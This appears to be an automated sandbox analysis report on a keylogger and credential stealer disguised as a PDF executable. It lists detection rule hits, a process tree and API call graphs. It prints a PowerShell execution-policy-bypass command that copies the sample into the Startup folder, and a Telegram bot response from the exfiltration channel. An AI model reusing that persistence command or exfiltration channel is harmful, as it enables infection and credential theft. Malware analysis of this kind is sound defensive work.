                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 553
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                              2025-01-13 11:08:43 UTC553INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 35 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 39 39 37 39 30 39 30 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 4f 57 45 52 32 30 32 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 65 74 73 64 65 61 6c 55 70 64 61 74 65 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 33 37 34 38 31 39 37 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 65 6e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 61 6e 6b 75 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 72 68 64 62 6c 61 6e 6b 75 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37
                                                                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":4563,"from":{"id":7199790900,"is_bot":true,"first_name":"POWER2025","username":"LetsdealUpdateBot"},"chat":{"id":7437481970,"first_name":"Ben","last_name":"Blankus","username":"Lorhdblankus","type":"private"},"date":17367


                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:06:08:02
                                                                                                                                                                              Start date:13/01/2025
                                                                                                                                                                              Path:C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"
                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                              File size:1'043'968 bytes
                                                                                                                                                                              MD5 hash:1F74495F02AD58FF437B07CF58A3E0AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000000.00000002.4158597133.00000000051C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:1
                                                                                                                                                                              Start time:06:08:03
                                                                                                                                                                              Start date:13/01/2025
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PDF-3093900299039 pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'
                                                                                                                                                                              Imagebase:0x9a0000
                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:06:08:03
                                                                                                                                                                              Start date:13/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:06:08:05
                                                                                                                                                                              Start date:13/01/2025
                                                                                                                                                                              Path:C:\Users\user\Desktop\PDF-3093900299039 pdf.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\PDF-3093900299039 pdf.exe"
                                                                                                                                                                              Imagebase:0xfc0000
                                                                                                                                                                              File size:1'043'968 bytes
                                                                                                                                                                              MD5 hash:1F74495F02AD58FF437B07CF58A3E0AD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:06:08:05
                                                                                                                                                                              Start date:13/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:06:08:16
                                                                                                                                                                              Start date:13/01/2025
                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"
                                                                                                                                                                              Imagebase:0xc90000
                                                                                                                                                                              File size:1'043'968 bytes
                                                                                                                                                                              MD5 hash:1F74495F02AD58FF437B07CF58A3E0AD
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 61%, ReversingLabs
                                                                                                                                                                              • Detection: 64%, Virustotal, Browse
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:06:08:17
                                                                                                                                                                              Start date:13/01/2025
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe'
                                                                                                                                                                              Imagebase:0x9a0000
                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:06:08:17
                                                                                                                                                                              Start date:13/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:06:08:18
                                                                                                                                                                              Start date:13/01/2025
                                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe"
                                                                                                                                                                              Imagebase:0xd70000
                                                                                                                                                                              File size:1'043'968 bytes
                                                                                                                                                                              MD5 hash:1F74495F02AD58FF437B07CF58A3E0AD
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:9.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:349
                                                                                                                                                                                Total number of Limit Nodes:22
                                                                                                                                                                                execution_graph 40890 27c4668 40891 27c467a 40890->40891 40892 27c4686 40891->40892 40896 27c4779 40891->40896 40901 27c3e10 40892->40901 40894 27c46a5 40897 27c479d 40896->40897 40905 27c4878 40897->40905 40909 27c4888 40897->40909 40902 27c3e1b 40901->40902 40917 27c5c64 40902->40917 40904 27c6fcf 40904->40894 40906 27c4888 40905->40906 40907 27c498c 40906->40907 40913 27c4248 40906->40913 40907->40907 40910 27c48af 40909->40910 40911 27c498c 40910->40911 40912 27c4248 CreateActCtxA 40910->40912 40911->40911 40912->40911 40914 27c5918 CreateActCtxA 40913->40914 40916 27c59db 40914->40916 40918 27c5c6f 40917->40918 40921 27c5c84 40918->40921 40920 27c7085 40920->40904 40922 27c5c8f 40921->40922 40925 27c5cb4 40922->40925 40924 27c7162 40924->40920 40926 27c5cbf 40925->40926 40929 27c5ce4 40926->40929 40928 27c7265 40928->40924 40930 27c5cef 40929->40930 40932 27c8310 40930->40932 40936 27c85b8 40930->40936 40931 27c85a9 40931->40928 40932->40931 40942 27ccd10 40932->40942 40946 27ccd00 40932->40946 40937 27c859c 40936->40937 40939 27c85c7 40936->40939 40938 27c85a9 40937->40938 40940 27ccd10 4 API calls 40937->40940 40941 27ccd00 4 API calls 40937->40941 40938->40932 40939->40932 40940->40938 40941->40938 40943 27ccd31 40942->40943 40944 27ccd55 40943->40944 40950 27ccec0 40943->40950 40944->40931 40948 27ccd10 40946->40948 40947 27ccd55 40947->40931 40948->40947 40949 27ccec0 4 API calls 40948->40949 40949->40947 40952 27ccecd 40950->40952 40951 27ccf07 40951->40944 40952->40951 40954 27cb720 40952->40954 40955 27cb72b 40954->40955 40957 27cdc18 40955->40957 40958 27cd024 40955->40958 40957->40957 40959 27cd02f 40958->40959 40960 27c5ce4 4 API calls 40959->40960 40961 27cdc87 40960->40961 40962 27cdc96 40961->40962 40963 27cdd00 3 API calls 40961->40963 40964 27cdcf2 3 API calls 40961->40964 40962->40957 40963->40962 40964->40962 40965 27cd3d8 40966 27cd41e 40965->40966 40970 27cd5b8 40966->40970 40973 27cd5a8 40966->40973 40967 27cd50b 40977 27cb730 40970->40977 40974 27cd5b6 40973->40974 40975 27cb730 DuplicateHandle 40974->40975 40976 27cd5e6 40975->40976 40976->40967 40978 27cd620 DuplicateHandle 40977->40978 40979 27cd5e6 40978->40979 40979->40967 40980 4dd41b8 40981 4dd41c8 40980->40981 40985 6ce14a8 40981->40985 40991 6ce14b8 40981->40991 40982 4dd41f1 40986 6ce14b8 40985->40986 40997 4dd5aac 40986->40997 41003 4dd5800 40986->41003 41015 4dd57f0 40986->41015 40987 6ce1542 40987->40982 40992 6ce14ed 40991->40992 40994 4dd5aac 2 API calls 40992->40994 40995 4dd57f0 2 API calls 40992->40995 40996 4dd5800 2 API calls 40992->40996 40993 6ce1542 40993->40982 40994->40993 40995->40993 40996->40993 40998 4dd5ab5 40997->40998 41000 4dd5ad3 40997->41000 40999 4dd4330 2 API calls 40998->40999 40998->41000 40999->41000 41001 4dd4330 2 API calls 41000->41001 41002 4dd5c0c 41000->41002 41001->41002 41002->40987 41004 4dd5802 41003->41004 41005 4dd5a64 41004->41005 41027 4dd51f4 41004->41027 41007 4dd4330 2 API calls 41005->41007 41008 4dd5c0c 41005->41008 41007->41008 41008->40987 41009 4dd58e5 41010 4dd4330 2 API calls 41009->41010 41014 4dd598d 41009->41014 41011 4dd5957 41010->41011 41012 4dd4330 2 API calls 41011->41012 41012->41014 41013 4dd4330 2 API calls 41013->41005 41014->41013 41019 4dd5800 41015->41019 41016 4dd51f4 2 API calls 41020 4dd58e5 41016->41020 41017 4dd4330 2 API calls 41018 4dd5c0c 41017->41018 41018->40987 41019->41016 41025 4dd5a64 41019->41025 41021 4dd4330 2 API calls 41020->41021 41026 4dd598d 41020->41026 41022 4dd5957 41021->41022 41023 4dd4330 2 API calls 41022->41023 41023->41026 41024 4dd4330 2 API calls 41024->41025 41025->41017 41025->41018 41026->41024 41029 4dd51ff 41027->41029 41028 4dd4330 2 API calls 41032 4dd5d69 41028->41032 41030 4dd4330 2 API calls 41029->41030 41031 4dd5da7 41029->41031 41029->41032 41030->41032 41031->41009 41032->41028 41032->41031 41053 6ce4fbb 41054 6ce4fce 41053->41054 41058 6ce52a0 PostMessageW 41054->41058 41060 6ce5271 PostMessageW 41054->41060 41055 6ce4ff1 41059 6ce530c 41058->41059 41059->41055 41061 6ce530c 41060->41061 41061->41055 40638 6ce0448 40639 6ce046e 40638->40639 40642 6ce0482 40639->40642 40645 27cdd00 40639->40645 40652 27cdcf2 40639->40652 40646 27cdd2e 40645->40646 40649 27cddff 40646->40649 40659 4dd4330 40646->40659 40664 4dd4320 40646->40664 40647 27cdda6 40648 27cddfa KiUserCallbackDispatcher 40647->40648 40648->40649 40653 27cdd2e 40652->40653 40656 27cddff 40653->40656 40657 4dd4330 2 API calls 40653->40657 40658 4dd4320 2 API calls 40653->40658 40654 27cdda6 40655 27cddfa KiUserCallbackDispatcher 40654->40655 40655->40656 40657->40654 40658->40654 40660 4dd4340 40659->40660 40661 4dd437d 40660->40661 40669 6ce07da 40660->40669 40675 6ce07e8 40660->40675 40661->40647 40665 4dd4330 40664->40665 40666 4dd437d 40665->40666 40667 6ce07da 2 API calls 40665->40667 40668 6ce07e8 2 API calls 40665->40668 40666->40647 40667->40666 40668->40666 40670 6ce0766 40669->40670 40672 6ce07de 40669->40672 40670->40661 40671 6ce0a55 40672->40671 40680 6ce3708 40672->40680 40685 6ce36f9 40672->40685 40677 6ce0821 40675->40677 40676 6ce0a55 40677->40676 40678 6ce3708 SendMessageW 40677->40678 40679 6ce36f9 SendMessageW 40677->40679 40678->40676 40679->40676 40681 6ce3716 40680->40681 40682 6ce371a SendMessageW 40680->40682 40681->40671 40684 6ce37cc 40682->40684 40684->40671 40686 6ce3716 40685->40686 40687 6ce371a SendMessageW 40685->40687 40686->40671 40689 6ce37cc 40687->40689 40689->40671 40690 6ce1b08 40691 6ce1b0a 40690->40691 40694 6ce009c 40691->40694 40695 6ce1b40 SendMessageW 40694->40695 40696 6ce1b29 40695->40696 40697 6cef108 DispatchMessageW 40698 6cef174 40697->40698 41033 6ce1568 41034 6ce15aa 41033->41034 41035 6ce15b0 SetWindowTextW 41033->41035 41034->41035 41036 6ce15e1 41035->41036 41037 6cee968 PeekMessageW 41038 6cee9df 41037->41038 41039 27cac50 41043 27cad48 41039->41043 41048 27cad37 41039->41048 41040 27cac5f 41044 27cad7c 41043->41044 41045 27cad59 41043->41045 41044->41040 41045->41044 41046 27caf80 GetModuleHandleW 41045->41046 41047 27cafad 41046->41047 41047->41040 41049 27cad48 41048->41049 41050 27cad7c 41049->41050 41051 27caf80 GetModuleHandleW 41049->41051 41050->41040 41052 27cafad 41051->41052 41052->41040 40699 d3d01c 40700 d3d034 40699->40700 40701 d3d08e 40700->40701 40705 6ce1ac1 40700->40705 40709 4dd2808 40700->40709 40714 4dd2818 40700->40714 40719 4dd4021 40705->40719 40723 4dd4050 40705->40723 40706 6ce1af5 40706->40701 40710 4dd280d 40709->40710 40711 4dd2877 40710->40711 40727 4dd2d88 40710->40727 40732 4dd2da8 40710->40732 40715 4dd2845 40714->40715 40716 4dd2877 40715->40716 40717 4dd2d88 3 API calls 40715->40717 40718 4dd2da8 3 API calls 40715->40718 40717->40716 40718->40716 40720 4dd4050 40719->40720 40721 4dd4099 40720->40721 40722 4dd40ea CallWindowProcW 40720->40722 40721->40706 40722->40721 40724 4dd4092 40723->40724 40726 4dd4099 40723->40726 40725 4dd40ea CallWindowProcW 40724->40725 40724->40726 40725->40726 40726->40706 40729 4dd2da8 40727->40729 40728 4dd2e48 40728->40711 40737 4dd2e50 40729->40737 40743 4dd2e60 40729->40743 40734 4dd2dbc 40732->40734 40733 4dd2e48 40733->40711 40735 4dd2e50 3 API calls 40734->40735 40736 4dd2e60 3 API calls 40734->40736 40735->40733 40736->40733 40738 4dd2e71 40737->40738 40749 6ce0acf 40737->40749 40775 6ce0ae0 40737->40775 40801 4dd3420 40737->40801 40806 4dd3411 40737->40806 40738->40728 40744 4dd2e71 40743->40744 40745 6ce0acf 3 API calls 40743->40745 40746 4dd3411 2 API calls 40743->40746 40747 4dd3420 2 API calls 40743->40747 40748 6ce0ae0 3 API calls 40743->40748 40744->40728 40745->40744 40746->40744 40747->40744 40748->40744 40750 6ce0ad5 40749->40750 40751 6ce0afe 40750->40751 40752 6ce0b40 40750->40752 40765 6ce0b15 40750->40765 40753 6ce0b1a 40751->40753 40754 6ce0b03 40751->40754 40759 6ce0dcc 40752->40759 40760 6ce0b51 40752->40760 40752->40765 40757 6ce0b23 40753->40757 40758 6ce0ca1 40753->40758 40755 6ce0b0c 40754->40755 40756 6ce0d2a 40754->40756 40761 6ce0da2 40755->40761 40755->40765 40825 6ce0230 40756->40825 40757->40765 40766 6ce0d38 40757->40766 40767 6ce0d94 40757->40767 40769 6ce0c8e 40757->40769 40771 6ce0c46 40757->40771 40819 6ce01e0 40758->40819 40833 6ce02e0 40759->40833 40760->40765 40760->40769 40760->40771 40837 6ce02b0 CallWindowProcW CallWindowProcW 40761->40837 40765->40769 40774 6ce10b0 2 API calls 40765->40774 40772 6ce10b0 2 API calls 40766->40772 40829 6ce02a0 40767->40829 40769->40738 40811 6ce10b0 40771->40811 40772->40769 40774->40769 40776 6ce0af9 40775->40776 40791 6ce0b15 40775->40791 40777 6ce0afe 40776->40777 40778 6ce0b40 40776->40778 40779 6ce0b1a 40777->40779 40780 6ce0b03 40777->40780 40785 6ce0dcc 40778->40785 40786 6ce0b51 40778->40786 40778->40791 40783 6ce0b23 40779->40783 40784 6ce0ca1 40779->40784 40781 6ce0b0c 40780->40781 40782 6ce0d2a 40780->40782 40787 6ce0da2 40781->40787 40781->40791 40788 6ce0230 2 API calls 40782->40788 40783->40791 40792 6ce0d38 40783->40792 40793 6ce0d94 40783->40793 40795 6ce0c8e 40783->40795 40797 6ce0c46 40783->40797 40790 6ce01e0 OleInitialize 40784->40790 40789 6ce02e0 2 API calls 40785->40789 40786->40791 40786->40795 40786->40797 40879 6ce02b0 CallWindowProcW CallWindowProcW 40787->40879 40788->40795 40789->40795 40790->40795 40791->40795 40799 6ce10b0 2 API calls 40791->40799 40800 6ce10b0 2 API calls 40792->40800 40796 6ce02a0 2 API calls 40793->40796 40795->40738 40796->40795 40798 6ce10b0 2 API calls 40797->40798 40798->40795 40799->40795 40800->40795 40803 4dd3422 40801->40803 40802 4dd34bd 40802->40738 40803->40802 40880 6ce1140 40803->40880 40885 6ce1150 40803->40885 40808 4dd3420 40806->40808 40807 4dd34bd 40807->40738 40808->40807 40809 6ce1140 2 API calls 40808->40809 40810 6ce1150 2 API calls 40808->40810 40809->40807 40810->40807 40812 6ce10bb 40811->40812 40813 6ce10c2 40811->40813 40838 6ce0340 40812->40838 40847 6ce10d2 40813->40847 40852 6ce10e0 40813->40852 40815 6ce10c8 40815->40769 40816 6ce10c0 40816->40769 40820 6ce01eb 40819->40820 40823 6ce67bd 40820->40823 40857 6ce54a0 40820->40857 40822 6ce6803 40822->40769 40823->40822 40824 6ce54a0 OleInitialize 40823->40824 40824->40822 40826 6ce023b 40825->40826 40827 6ce10b0 2 API calls 40826->40827 40828 6ce12c6 40827->40828 40828->40769 40830 6ce02ab 40829->40830 40831 6ce10b0 2 API calls 40830->40831 40832 6ce4434 40831->40832 40832->40769 40834 6ce02eb 40833->40834 40835 6ce10b0 2 API calls 40834->40835 40836 6ce3de1 40835->40836 40836->40769 40837->40769 40839 6ce034b 40838->40839 40840 6ce88f6 40839->40840 40846 6ce87fb 40839->40846 40841 6ce10e0 2 API calls 40840->40841 40842 6ce8901 40841->40842 40842->40816 40843 6ce10e0 2 API calls 40844 6ce88ef 40843->40844 40844->40816 40845 6ce8807 40845->40816 40846->40843 40846->40845 40848 6ce10e0 40847->40848 40849 4dd3411 2 API calls 40848->40849 40850 6ce10fc 40848->40850 40851 4dd3420 2 API calls 40848->40851 40849->40850 40850->40815 40851->40850 40853 6ce10e2 40852->40853 40854 4dd3411 2 API calls 40853->40854 40855 4dd3420 2 API calls 40853->40855 40856 6ce10fc 40853->40856 40854->40856 40855->40856 40856->40815 40858 6ce54ab 40857->40858 40859 6ce682e 40858->40859 40862 6ce6858 40858->40862 40867 6ce6868 40858->40867 40859->40823 40863 6ce6890 40862->40863 40866 6ce68bc 40862->40866 40864 6ce6899 40863->40864 40872 6ce553c 40863->40872 40864->40859 40866->40859 40868 6ce6890 40867->40868 40871 6ce68bc 40867->40871 40869 6ce6899 40868->40869 40870 6ce553c OleInitialize 40868->40870 40869->40859 40870->40871 40871->40859 40873 6ce5547 40872->40873 40874 6ce6bb3 40873->40874 40876 6ce5558 40873->40876 40874->40866 40877 6ce6be8 OleInitialize 40876->40877 40878 6ce6c4c 40877->40878 40878->40874 40879->40795 40881 6ce1196 40880->40881 40882 6ce11b9 40881->40882 40883 4dd4021 CallWindowProcW 40881->40883 40884 4dd4050 CallWindowProcW 40881->40884 40882->40802 40883->40882 40884->40882 40886 6ce1196 40885->40886 40887 6ce11b9 40886->40887 40888 4dd4021 CallWindowProcW 40886->40888 40889 4dd4050 CallWindowProcW 40886->40889 40887->40802 40888->40887 40889->40887
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q$4'^q$4'^q$4'^q$4|cq$4|cq
                                                                                                                                                                                • API String ID: 0-2087561084
                                                                                                                                                                                • Opcode ID: e3aadd0c0e83c70491a3da23cb6a496e78b7d87b6f2175638b3b24fd6dc88f7a
                                                                                                                                                                                • Instruction ID: 9701282ceec548ecce0602070ab51522ff9b634b9f08576ba2302f7914c4494b
                                                                                                                                                                                • Opcode Fuzzy Hash: e3aadd0c0e83c70491a3da23cb6a496e78b7d87b6f2175638b3b24fd6dc88f7a
                                                                                                                                                                                • Instruction Fuzzy Hash: 69630874A00619CFCB24DF68C988A9DBBB2FF89300F158599E459AB361DB35ED81CF50
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.4156877688.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4dd0000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                                                                                                                • API String ID: 0-3486158592
                                                                                                                                                                                • Opcode ID: 29023374743a2fa9ee7b767405fe42e508f2a9ced00ab894c37357b07cf8d74b
                                                                                                                                                                                • Instruction ID: bf1e5e8938bd53ba7a1b21618f91a30d963c994f98f6e8f32ca45ef82795529b
                                                                                                                                                                                • Opcode Fuzzy Hash: 29023374743a2fa9ee7b767405fe42e508f2a9ced00ab894c37357b07cf8d74b
                                                                                                                                                                                • Instruction Fuzzy Hash: 08526D34B005159FCB18DF69C598A6E7BB2BF84354F16816AE816EB364DB31FC41CB90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
